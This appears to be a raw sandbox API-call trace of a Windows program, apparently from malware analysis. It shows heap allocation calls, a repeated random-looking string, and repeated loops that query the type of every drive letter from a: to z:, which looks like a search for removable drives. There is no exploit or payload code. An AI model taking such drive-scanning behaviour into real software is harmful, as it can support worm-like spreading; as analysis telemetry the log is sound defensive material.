0x12ef800 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0210.266] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0210.266] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.266] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0210.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0210.267] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0210.267] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0210.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0210.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.267] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.267] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.268] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.268] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.268] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.268] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.268] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.268] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.328] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.328] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.328] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.328] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.328] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.329] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.329] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.329] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.329] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.330] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.330] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.330] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.330] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.330] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.331] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.331] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.331] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.331] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.332] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.332] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0210.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0210.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0210.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.333] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.333] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0210.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.334] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.334] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.334] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.334] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.334] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.335] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.335] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.335] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.335] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.335] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.335] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.336] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.336] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.336] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.336] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.336] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.337] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.337] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.337] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.337] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.337] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.338] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.338] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.338] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.338] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.338] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.339] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.339] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.339] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.340] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0210.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0210.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.341] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.341] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0210.341] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0210.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0210.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.342] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.342] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.342] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.342] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.342] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.343] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.344] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.345] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.346] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.346] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.346] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.346] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.347] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, 